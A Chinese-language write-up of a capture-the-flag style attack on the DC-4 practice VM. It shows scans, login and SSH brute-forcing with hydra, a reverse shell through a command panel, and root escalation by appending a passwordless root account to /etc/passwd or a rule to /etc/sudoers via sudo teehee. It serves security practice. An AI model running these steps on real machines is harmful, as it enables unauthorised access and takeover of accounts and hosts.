首页 > 其他分享 >DC-4

DC-4

时间:2024-03-15 20:00:24浏览次数:30  
标签:bin Apr jim DC dc 2019 usr

DC-4渗透测试过程

主机扫描

arp-scan -l

靶机ip:192.168.56.110

端口扫描

nmap -A 192.168.56.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-15 07:08 EDT
Nmap scan report for 192.168.56.110
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 08:00:27:8A:84:D7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

dirsearch -u http://192.168.56.110
Target: http://192.168.56.110/

[07:12:12] Starting: 
[07:12:40] 302 -  704B  - /command.php  ->  index.php
[07:12:42] 301 -  170B  - /css  ->  http://192.168.56.110/css/
[07:12:52] 301 -  170B  - /images  ->  http://192.168.56.110/images/
[07:12:52] 403 -  556B  - /images/
[07:12:52] 403 -   15B  - /index.pHp
[07:12:57] 302 -  206B  - /login.php  ->  index.php
[07:12:58] 302 -  163B  - /logout.php  ->  index.php

访问web页面

爆破登录页面

image-20240315191803905

admin happy

进到后台,发现可以执行命令

直接反弹shell

image-20240315192253431

查找suid权限的文件

www-data@dc-4:/home$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping

这里exim4是有漏洞的,和dc-8的一样

我这里跟着靶机思路再做一遍

进到home目录

www-data@dc-4:/home/jim$ ls -la
ls -la
total 36
drwxr-xr-x 3 jim  jim  4096 Mar 12 21:37 .
drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim    22 Mar 12 21:25 test.sh

发现密码文件

www-data@dc-4:/home/jim$ cd backups
cd backups
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak

可能是jim的密码

爆破SSH

hydra -l jim -P pass.txt ssh://192.168.56.110
[22][ssh] host: 192.168.56.110   login: jim   password: jibril04
jim@dc-4:~$ cat mbox
cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

提权

jim@dc-4:~$ cd /var/mail
cd /var/mail
jim@dc-4:/var/mail$ ls
ls
jim  www-data
jim@dc-4:/var/mail$ cat jim
cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$ sudo -l
sudo -l
[sudo] password for jim: ^xHhA&hvim0y

Sorry, try again.
[sudo] password for jim: jibril04

Sorry, user jim may not run sudo on dc-4.

得到Charles的登录密码,^xHhA&hvim0y

charles@dc-4:~$ sudo -l
sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

可以用teehee命令

看一下teehee的手册

用法:teehee [选项] ... [文件] ...

将标准输入复制到每个FILE,也复制到标准输出。

-a、 --附加到给定的FILEs,不覆盖

-i、 --忽略中断忽略中断信号

-p诊断写入非管道的错误

利用管道写进文件

可以写/etc/passwd或者/etc/sudoers

echo "root1::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su - root1

或者

echo "charles   ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers
sudo su -

image-20240315195417005

总结

主要考察爆破,ssh爆破,登录页面爆破

靶机涉及知识点:

爆破,teeheee提权,/etc/passwd,/etc/sudoers文件利用

标签:bin,Apr,jim,DC,dc,2019,usr
From: https://www.cnblogs.com/C0rr3ct/p/18076146

相关文章

  • 变更数据捕获(CDC)工具综述
    变更数据捕获(ChangeDataCapture,CDC)是一种技术,用于实时捕获数据库中的变更(如插入、更新和删除操作),并将这些变更同步到其他数据库或数据仓库中,从而保持数据环境的一致性和实时性。CDC技术对于实现实时数据分析、数据集成、数据复制和备份等场景至关重要。本文将介绍当前市场上一......
  • BOSHIDA DC电源模块与节能环保的关系探讨
    BOSHIDADC电源模块与节能环保的关系探讨DC电源模块与节能环保之间有密切的关系。首先,DC电源模块是一种转换电力的装置,能够将交流电转换成直流电供应给各种电子设备使用,相比传统的交流电源,DC电源模块具有更高的转换效率,减少了能量传输过程中的能量损失,从而达到节能的目的。 ......
  • 多bit信号跨时钟域(CDC)处理方法
    参考csdn:(1)跨时钟域处理解析(一)-CSDN博客(2)FPGA学习笔记——跨时钟域(CDC)设计之多bit信号同步_多bit同步skew约束-CSDN博客(3)跨时钟传输——多比特_多bit跨时钟域-CSDN博客参考其他:(1)【数字IC】异步FIFO设计详解(含源码)-知乎(zhihu.com)1.亚稳态问题        首先......
  • leedcode-用队列实现栈
    利用内置的listclassMyStack:def__init__(self):#初始化一个空列表用于存储栈的元素self.li=list()defpush(self,x:int)->None:#向栈中压入元素xself.li.append(x)defpop(self)->int:#从栈顶弹......
  • vulnhub靶机:dc-8
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24靶机ip10.9.23.742:端口扫描nmap-A-p--T410.9.23.743:端口探测4:目录遍历dirbhttp://10.9.23.74http://10.9.23.74/robots.txt发现有登录界面地址,访问一下:/?q=user/login/发现可能存在sql注入二:渗透测......
  • 通过DCERPC和ntlmssp获取Windows远程主机信息
    最初首发于:https://www.freebuf.com/articles/system/334948.html前言本文通过利用DCERPC协议的ping,并附加NTLMSSP认证信息来获取获取windows远程主机的版本号,主机名,所在域的域名,DNS等信息。因为通过rpc进行探测的工具,大部分都是依托impacket来实现,而实战中通过挂代理进行内网......
  • BJDCTF2020[encode]
    题目:encode,地址:encode查壳发现时upx壳,使用工具脱壳命令"upx-d",如果遇到工具脱不了的壳就手动脱壳,手动脱壳请帅哥美女*们看这篇手动脱壳。使用ida打开,观察逻辑后重命名函数:逻辑为一个换表base64+异或+RC4。其中RC4可以根据函数传入key,进而生成Box盒子来判断:知道逻辑后......
  • DDCMS 后端容器化解决方案:实现优雅的环境隔离,提升开发者体验
    DDCMS后端容器化解决方案:实现优雅的环境隔离,提升开发者体验浅聊一下,最近在参与DDCMS的组件开发和测试,碰到的一些问题,这个项目涉及了DDCMS-Contract和DDCMS-Service以及DDCMS-Front。合约、后端、前端。合约整理完了整体的业务和设计,当前在弄后端的时候,每一次部署稍微麻烦......
  • leedcode-完全二叉树的节点个数
    自己写的,使用广度优先BFS,迭代:classSolution:defcountNodes(self,root:Optional[TreeNode])->int:#如果根节点为空,则树中节点数为0ifnotroot:return0#初始化队列,并将根节点放入队列中queue=[root]......
  • BOSHIDA DC电源模块的故障排除与维修方法
    BOSHIDADC电源模块的故障排除与维修方法当DC电源模块出现故障时,可以按照以下步骤进行排除和维修: 1.检查电源输入:首先检查电源输入是否正常,包括输入电压是否稳定,输入电流是否符合要求。如果输入电源有问题,需要修复或更换电源。2.检查输出电压:使用万用表或示波器测量输出电压......